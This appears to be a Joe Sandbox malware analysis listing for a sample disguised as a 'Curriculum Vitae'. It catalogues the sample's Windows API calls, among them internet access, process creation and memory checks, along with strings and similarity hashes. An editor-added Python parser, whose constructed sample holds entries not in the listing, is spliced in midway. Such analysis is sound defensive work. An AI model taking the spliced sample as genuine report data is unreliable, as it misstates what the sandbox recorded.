                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Connection_wcslen
                      • String ID: *$LPT
                      • API String ID: 1725874428-3443410124
                      • Opcode ID: 4c8c6cc538dc675393b8fa90ee0bc93cdef5c66870296be43cdddbb91fb23c38
                      • Instruction ID: 3c1a7bdcde216c3c8c08f84f2b2ec85f1c8c939abec48158cd1ad37a67ed2336
                      • Opcode Fuzzy Hash: 4c8c6cc538dc675393b8fa90ee0bc93cdef5c66870296be43cdddbb91fb23c38
                      • Instruction Fuzzy Hash: F5914F75A012049FCB14DF58C484EAABBF1EF85304F198099E84A9F362D775EE85CBB1
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00D5E30D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: 8e42602fbddde61ab1027a9b8dcac7343325b301fe5142595ff2730d44deb850
                      • Instruction ID: f8c3a1c2c0640698702e4d473681dc4eeae4d62a80d3bd0e21633f44c101cbdf
                      • Opcode Fuzzy Hash: 8e42602fbddde61ab1027a9b8dcac7343325b301fe5142595ff2730d44deb850
                      • Instruction Fuzzy Hash: FF519B61A0C20697DF197724C9013792B94EF10746F284D99FCD1823A9EB318DCD9A76
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: #
                      • API String ID: 0-1885708031
                      • Opcode ID: f7baebd65fe0cb8614741d4afe3d35bf74b834af07ad03f1464f7cfe460cddc4
                      • Instruction ID: cff0c5c475c4dd0a0bd38595100efaa167b9c501c03ec9ffc509c364ca6ca7bb
                      • Opcode Fuzzy Hash: f7baebd65fe0cb8614741d4afe3d35bf74b834af07ad03f1464f7cfe460cddc4
                      • Instruction Fuzzy Hash: 0A512375604346EFDB15EF28C881ABE7BA8FF55310F288155E8919B2D0D674DD42CBB0
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00D4F2A2
                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D4F2BB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: GlobalMemorySleepStatus
                      • String ID: @
                      • API String ID: 2783356886-2766056989
                      • Opcode ID: 446b58002055605fdc806c21d577ba7e4004af4109cb454859a7422a4db974b3
                      • Instruction ID: f639c63101cb1126ed9a070a8d417836cbff7f8fe8acbf9cbf93a7fa9a626460
                      • Opcode Fuzzy Hash: 446b58002055605fdc806c21d577ba7e4004af4109cb454859a7422a4db974b3
                      • Instruction Fuzzy Hash: AA5124725187499BD320AF10D886BAFBBF8FF84300F81885DF1D9911A5EB708529CB76
                      APIs
                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00DB57E0
                      • _wcslen.LIBCMT ref: 00DB57EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: BuffCharUpper_wcslen
                      • String ID: CALLARGARRAY
                      • API String ID: 157775604-1150593374
                      • Opcode ID: f87dac24b127d433c95e3d891fe13b4f62b2cc0957ea5bf6ce4e4dfb8ccf8040
                      • Instruction ID: de28ae3a1f513046365568aa684d4dc362a309199bb71eeac3730e0f061c16bd
                      • Opcode Fuzzy Hash: f87dac24b127d433c95e3d891fe13b4f62b2cc0957ea5bf6ce4e4dfb8ccf8040
                      • Instruction Fuzzy Hash: B341AC35A0020ADFCB14DFA9D881AEEBBB5FF59320F144069E506A7255E770DD81CBB0
                      APIs
                      • _wcslen.LIBCMT ref: 00DAD130
                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DAD13A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CrackInternet_wcslen
                      • String ID: |
                      • API String ID: 596671847-2343686810
                      • Opcode ID: 940f6aa697983986686e39d47e9f1caa059ff75baca04b769d8bb90e225b7834
                      • Instruction ID: 1caa9c71cc6d583c04209bcd225f037832afc4c9f9e683db429c76d6d0829aae
                      • Opcode Fuzzy Hash: 940f6aa697983986686e39d47e9f1caa059ff75baca04b769d8bb90e225b7834
                      • Instruction Fuzzy Hash: C4310C71D01219ABCF15EFA4CC85AEEBFBAFF09300F104019F815A6165D735AA56DB70
                      APIs
                      • DestroyWindow.USER32(?,?,?,?), ref: 00DC3621
                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DC365C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$DestroyMove
                      • String ID: static
                      • API String ID: 2139405536-2160076837
                      • Opcode ID: 972b8e7c656ce735e01692a6b55cdb6dc110886de30ad70d9ec5025eefa86f6f
                      • Instruction ID: 92c24bce31cdef77f99c07c58644b6d8ccc587f3d50298507cc9943bea2dc821
                      • Opcode Fuzzy Hash: 972b8e7c656ce735e01692a6b55cdb6dc110886de30ad70d9ec5025eefa86f6f
                      • Instruction Fuzzy Hash: 2831AA71110205AEDB149F68CC80FFB73A9FF88720F10961DF9A997290DA31AD81DB70
                      APIs
                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00DC461F
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DC4634
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: '
                      • API String ID: 3850602802-1997036262
                      • Opcode ID: f14c7941a92e10a276953c986b3187d13fab9cf54940a71648e6ad5c397f20df
                      • Instruction ID: 03fe4ffa9d7810966989f27aed55779400a950c16fbb21f3d3c24a2a694e05ed
                      • Opcode Fuzzy Hash: f14c7941a92e10a276953c986b3187d13fab9cf54940a71648e6ad5c397f20df
                      • Instruction Fuzzy Hash: 81310874A0120A9FDB14CF69C990FDA7BB5FF49300F14406AE905AB395D770A941CFA0
                      APIs
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DC327C
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC3287
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Combobox
                      • API String ID: 3850602802-2096851135
                      • Opcode ID: 8f4c74c53b835df9f92713433a0f0aca83bf4c8881afd1144f3508678cab8351
                      • Instruction ID: f8dcfb06c1b5329756ca02468ab14b18dba84f2344c04cdb6e7263eba955fcbd
                      • Opcode Fuzzy Hash: 8f4c74c53b835df9f92713433a0f0aca83bf4c8881afd1144f3508678cab8351
                      • Instruction Fuzzy Hash: 0C11E27130020A7FEF259F94DC80FBB776AEB94364F148128F9189B290D631DD518770
                      APIs
                        • Part of subcall function 00D3600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D3604C
                        • Part of subcall function 00D3600E: GetStockObject.GDI32(00000011), ref: 00D36060
                        • Part of subcall function 00D3600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D3606A
                      • GetWindowRect.USER32(00000000,?), ref: 00DC377A
                      • GetSysColor.USER32(00000012), ref: 00DC3794
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                      • String ID: static
                      • API String ID: 1983116058-2160076837
                      • Opcode ID: e6ad2bffbf5c9d2bfd2a8ad7a8b474eb708892b2bc7e1aff359d3fcdf7e0f358
                      • Instruction ID: 9df881e9d2f37683fd20f9e779ae53e8c70a5a461cd31dc13fd7021030f1cfc1
                      • Opcode Fuzzy Hash: e6ad2bffbf5c9d2bfd2a8ad7a8b474eb708892b2bc7e1aff359d3fcdf7e0f358
                      • Instruction Fuzzy Hash: 75113AB261020AAFDF01DFA8CC46EEA7BF8FB08314F045518F955E3250D775E9519B60
                      APIs
                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DACD7D
                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DACDA6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Internet$OpenOption
                      • String ID: <local>
                      • API String ID: 942729171-4266983199
                      • Opcode ID: 46bb508ad7a6f458fe28dac97f717c875bcc3e9300b61a349f236cdef294efca
                      • Instruction ID: 776c0dce2c6ce5c38a03246978b5d1fba3247122ba5838f51129540bb118562f
                      • Opcode Fuzzy Hash: 46bb508ad7a6f458fe28dac97f717c875bcc3e9300b61a349f236cdef294efca
                      • Instruction Fuzzy Hash: 1811CE71225636BADB384B668C89EF7BEACEF137B4F00522AB15983180D7749841D6F0
                      APIs
                      • GetWindowTextLengthW.USER32(00000000), ref: 00DC34AB
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DC34BA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LengthMessageSendTextWindow
                      • String ID: edit
                      • API String ID: 2978978980-2167791130
                      • Opcode ID: e619f19e306803b47fa5f0b4c2bf576c2502d5bcd45f88c436c8d1ce36004635
                      • Instruction ID: 7762afe5fb0c583e3b2f87c6453b3581edb091d004af41d8321a742170b48cd6
                      • Opcode Fuzzy Hash: e619f19e306803b47fa5f0b4c2bf576c2502d5bcd45f88c436c8d1ce36004635
                      • Instruction Fuzzy Hash: 7C119D7110420AAEEB164F64DC40FAA376AEB05374F548328FA64931E0C731DC519B70
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • CharUpperBuffW.USER32(?,?,?), ref: 00D96CB6
                      • _wcslen.LIBCMT ref: 00D96CC2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$BuffCharUpper
                      • String ID: STOP
                      • API String ID: 1256254125-2411985666
                      • Opcode ID: 42b48d40192b9a70e1e55476f54ed05fdf1f0d1779d392dc04a4c57da67a5e46
                      • Instruction ID: 2993b9f117f7c162655955a0d49afbaeeb526af07f8e2a079759d86958c97218
                      • Opcode Fuzzy Hash: 42b48d40192b9a70e1e55476f54ed05fdf1f0d1779d392dc04a4c57da67a5e46
                      • Instruction Fuzzy Hash: ED010032A105278ACF21AFBDDC908BF7BA4EE60710B050528F86292290EA31E840C770
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00D93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00D93CCA
                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D91D4C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 624084870-1403004172
                      • Opcode ID: 84c2b59c0014ef702a511f781e168c94aaa748363ef16e5f10eb0b7dc1f95d07
                      • Instruction ID: ea040de7d8ec009f8fab94bb5852d859fec92b9733954b302a701a85065f752a
                      • Opcode Fuzzy Hash: 84c2b59c0014ef702a511f781e168c94aaa748363ef16e5f10eb0b7dc1f95d07
                      • Instruction Fuzzy Hash: F801D875601219AB8F08EBA4CD55DFEB768EF46350F040619F972573D1EA705908C670
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00D93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00D93CCA
                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D91C46
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 624084870-1403004172
                      • Opcode ID: 5cc4ae9267039234d229aa44528547060b224cdb443b7a78d1882b26f57fdbcf
                      • Instruction ID: 2ba8fd771a078a02c543d04b6d7a574fb4db5bd81d88f59d8a90da6b2a1ea5de
                      • Opcode Fuzzy Hash: 5cc4ae9267039234d229aa44528547060b224cdb443b7a78d1882b26f57fdbcf
                      • Instruction Fuzzy Hash: F801A7756851096ACF05EB90CA61EFFB7A8DF51340F140019B91667281EAA09E1CC6B1
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00D93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00D93CCA
                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D91CC8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 624084870-1403004172
                      • Opcode ID: abda74e462838d7ec257e4a0e35a537aa12364edef3f515efacf3c56d7e0f804
                      • Instruction ID: 221bd1bfdcb0b5cb1edeadef07faefa51b36509eed66bdd4071cf90b6a4a7014
                      • Opcode Fuzzy Hash: abda74e462838d7ec257e4a0e35a537aa12364edef3f515efacf3c56d7e0f804
                      • Instruction Fuzzy Hash: D801D6B96801196BCF04EBA1CA11EFEF7A8DB11340F540015B902B3281EAA09F18C671
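The three entries directly above share one API String ID (624084870-1403004172) and one string set (ComboBox$ListBox): the Similarity block exists precisely so that functions with an identical API-and-string profile can be matched against each other and across reports. As an added example (editor-written helper code, not part of this report and not Joe Sandbox's own tooling), the Python below parses entries in this listing's layout into records and clusters them by API String ID. The embedded SAMPLE is a constructed, abridged copy of three entries from this page; the regular expressions assume the bullet, "Part of subcall function", and "ref:" conventions visible here and nothing else.

```python
"""Editor-added helper (not part of the report or of Joe Sandbox): parse the
per-function listing above (APIs / Strings / Memory Dump Source / Similarity
blocks) into records and cluster functions that share an 'API String ID'."""
import re
from collections import defaultdict

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Matches e.g. "SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D91D4C" and
# "Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(
    r"^Source File: (?P<file>.+?), Offset: (?P<offset>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)$")

# Constructed sample: three entries abridged from the listing on this page; the
# third stops after its Strings block, as the page itself truncates it.
SAMPLE = """\
APIs
  • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
  • Part of subcall function 00D93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00D93CCA
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D91D4C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 84c2b59c0014ef702a511f781e168c94aaa748363ef16e5f10eb0b7dc1f95d07
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00D91C46
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 5cc4ae9267039234d229aa44528547060b224cdb443b7a78d1882b26f57fdbcf
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,00D3100A), ref: 00D50D75
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D3100A), ref: 00D50D84
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D50D7F
"""


def _bullet(line):
    """Text after a leading bullet, or None for header/other lines."""
    s = line.strip()
    return s[1:].strip() if s.startswith("•") else None


def parse_entries(text):
    """One dict per function; an entry starts at its 'APIs' header."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        s = raw.strip()
        if s in SECTION_HEADERS:
            if s == "APIs":
                cur = {"apis": [], "strings": [], "dump": {"associated": []}, "similarity": {}}
                entries.append(cur)
            section = s
            continue
        item = _bullet(s)
        if cur is None or item is None:
            continue
        if section == "APIs" and (m := API_RE.match(item)):
            d = m.groupdict()          # sub is None for the function's own calls
            d["args"] = d["args"].split(",") if d["args"] is not None else []
            cur["apis"].append(d)
        elif section == "Strings":
            value, sep, xref = item.rpartition(", xrefs: ")
            cur["strings"].append({"value": value if sep else item, "xrefs": xref if sep else ""})
        elif section == "Memory Dump Source":
            if m := SOURCE_RE.match(item):
                cur["dump"].update(m.groupdict())
            elif item.startswith("Associated: "):
                # the HTML page fuses the "Download File" link label onto the path
                path = item[len("Associated: "):].replace("Download File", "")
                cur["dump"]["associated"].append(path.strip())
        elif section == "Similarity":
            key, _, val = item.partition(":")
            cur["similarity"][key.strip()] = val.strip()
    return entries


def group_by_api_string_id(entries):
    """Map 'API String ID' -> Opcode IDs; clusters with more than one member are
    functions whose API set and string set are identical."""
    groups = defaultdict(list)
    for e in entries:
        sid = e["similarity"].get("API String ID")
        if sid:
            groups[sid].append(e["similarity"].get("Opcode ID", ""))
    return dict(groups)


def modules_used(entries):
    """Modules referenced anywhere in the listing, e.g. to check for WININET."""
    return {a["module"] for e in entries for a in e["apis"]}
```

Run it over a copy-pasted listing to get the clusters of functions that share an API String ID; "Part of subcall function" lines are kept with their sub address in the record so they can be filtered out when only a function's own calls matter, and the Associated paths are stored with the fused "Download File" label removed.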
                      APIs
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E03018,00E0305C), ref: 00DC81BF
                      • CloseHandle.KERNEL32 ref: 00DC81D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseCreateHandleProcess
                      • String ID: \0
                      • API String ID: 3712363035-3218720685
                      • Opcode ID: c665f1270251cdd986b6ff3ca49b925afe5bb61aa1545173115fb1a368aa0a1b
                      • Instruction ID: 45ee12c5044b56f41848c06abab9409648666705527eb3f2554a698e10e8a7b0
                      • Opcode Fuzzy Hash: c665f1270251cdd986b6ff3ca49b925afe5bb61aa1545173115fb1a368aa0a1b
